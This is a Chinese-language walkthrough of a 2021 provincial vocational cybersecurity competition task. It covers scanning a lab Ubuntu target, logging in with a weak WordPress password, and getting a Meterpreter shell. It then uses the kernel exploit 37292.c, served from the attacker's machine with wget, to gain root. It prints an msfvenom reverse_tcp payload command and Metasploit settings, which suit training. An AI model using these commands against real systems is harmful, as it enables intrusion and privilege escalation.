2021年中职“网络安全“江西省赛题—B-1:系统利用与提权

简介: 2021年中职“网络安全“江西省赛题—B-1:系统利用与提权

B-1:系统利用与提权


任务环境说明:

 服务器场景:PYsystem001

 服务器场景操作系统:Ubuntu(显示链接)

 服务器用户名:未知 密码:未知

  1. 使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口…,端口n])提交;


nmap -sV ip 扫描

  1. 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;


通过题目我们知道靶机有网站,我们利用kali中的dirb扫描网站的后台。

优先扫描特殊端口:dirb http://172.16.105.245:8080/

扫描出后台地址,通过题目提示弱口令登录

falg[admin,123456]

4. 利用Kali深入机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交;

这里固定的falg:[Payload]

命令:Msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.103 lport=8888 -f exe -o shell.exe

5. 对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获得的当前权限的用户名作为FLAG(形式:[用户名])提交;


我这里没有用这个上传的,我用的是msf中的wp_admin_shell_upload

set rhost 172.16.105.245

set username admin

set password 123456

set targeturi /wordpress


260d7b0907e848ed9e04a790fefa1cc1.png


shell连接后whoami查看权限

falg[daemon]

7. 查看系统内核版本信息,将系统内核版本号作为FLAG(形式:[版本号])提交;


命令:uname -a查看系统内核版本号

falg[3.13.0]

8. 在Kali攻击机中查找可使用的源码,将找到的源码文件名作为FLAG(形式:[文件名])提交;

利用kali中的searchsploit命令查看可使用的源码

命令searchsploit 3.13.0

falg[37292.c]

9. 利用上述源码后获得到的靶机/root下的唯一.txt文件的文件名作为FLAG(形式:[文件名])提交;

把源码复制到kali自带的网站目录下 cp 37292.c /var/www/html/

启动kali的apche服务


使用python切换至交互式shell

命令:python -c ‘import pty;pty.spawn(“/bin/bash”)’

使用命令wget把刚刚上传中37292.c文件下载下来


编译37292.c生成shell文件

运行shell文件,获得root权限

进入root目录查看txt文件名为adftutij.txt

flag[adftutij.txt]


11. 利用源码后将获得到的靶机/root下的唯一.txt文件的文件内容作为FLAG(形式:[文件内容])提交。

cat查看文件内容

flag[hyjufk983]






目录
相关文章
|
4天前
|
监控 安全 网络安全
漏洞扫描系统可以用于发现网络入侵者?
漏洞扫描系统自动检测系统安全漏洞,如未打补丁软件和弱密码,但无法直接发现网络入侵者。入侵者可能使用加密和掩盖手段逃避检测。为此,需结合入侵检测系统(IDS)、防火墙、安全事件管理(SIEM)系统和蜜罐等工具实时监控异常行为。企业还应提升员工安全意识以增强防御能力。
|
4天前
|
安全 网络安全 数据安全/隐私保护
网络安全与信息安全:防范漏洞、强化加密、提升意识
【5月更文挑战第13天】在数字化时代,随着网络信息技术的迅猛发展,网络安全与信息安全问题日益凸显。本文深入分析了网络安全漏洞产生的原因,探讨了加密技术在数据保护中的核心作用,并强调了提升公众安全意识的重要性。通过梳理当前网络环境中存在的风险点,提出相应的防护措施和改进策略,旨在为读者提供全面的网络安全知识框架。
|
1天前
|
存储 SQL 安全
网络安全与信息安全:防范漏洞,强化加密,提升安全意识
【5月更文挑战第18天】在数字化时代,网络安全与信息安全成为维护社会稳定、保障个人隐私的关键。本文深入剖析网络安全中存在的漏洞,介绍现代加密技术的进展,并探讨如何通过增强安全意识来构建更坚固的防御体系。文章旨在为读者提供全面而深入的安全知识分享,以应对日益复杂的网络威胁。
|
1天前
|
SQL 安全 网络安全
网络安全与信息安全:防范漏洞,加密技术与提升安全意识
【5月更文挑战第18天】 在数字化时代,网络安全与信息安全的重要性日益凸显。本文深入探讨了网络安全漏洞的概念、成因及其对个人与企业构成的潜在威胁。同时,文章详细分析了加密技术的种类与作用,以及如何通过加强安全意识来构建更为坚固的防护墙。通过对这些关键元素的综合阐述,旨在为读者提供一套系统化的网络与信息安全解决方案,以应对不断进化的安全挑战。
|
2天前
|
Linux 网络安全
CentOS系统openssh-9,网络安全大厂面试真题解析大全
CentOS系统openssh-9,网络安全大厂面试真题解析大全
|
2天前
|
安全 网络协议 网络安全
OWASP Top 10 网络安全10大漏洞——A01,源码+原理+手写框架
OWASP Top 10 网络安全10大漏洞——A01,源码+原理+手写框架
|
2天前
|
SQL 监控 安全
构筑网络堡垒:网络安全漏洞剖析与防御策略
【5月更文挑战第17天】随着信息技术的迅猛发展,网络安全成为维护信息完整性、保障用户隐私的关键。本文深入分析了网络安全中常见的漏洞类型及其成因,并探讨了加密技术在数据保护中的应用。同时,强调了提升安全意识在防范网络威胁中的重要性。通过综合措施,构建多层次的网络安全防护体系,为个人和组织的数字资产提供坚实的保障。
|
3天前
|
存储 安全 算法
网络防御先锋:揭秘网络安全漏洞与加固信息防线
【5月更文挑战第15天】在数字时代的风口浪尖,网络安全已成为维护信息完整性、确保数据流通安全的关键。本文将深入探讨网络安全中存在的漏洞、加密技术的进展以及提升安全意识的重要性,旨在为读者构建一道坚固的信息防线提供知识支持和实践指导。
|
4天前
|
安全 算法 网络安全
网络安全之盾:防御漏洞、加密技术与安全意识提升
【5月更文挑战第14天】 随着数字化时代的到来,网络信息安全已成为全球关注的焦点。本文旨在探讨网络安全的核心问题——漏洞挖掘和利用、加密技术的发展以及安全意识的提升,以期为读者提供全面的网络安全知识框架。通过对当前网络威胁的剖析,我们揭示了安全防护的必要性,并深入讨论了如何通过技术革新和教育提高来构建坚固的网络安全防线。
|
4天前
|
机器学习/深度学习 传感器 算法
LabVIEW开发基于神经网络的自动汽车制动系统
LabVIEW开发基于神经网络的自动汽车制动系统

热门文章

最新文章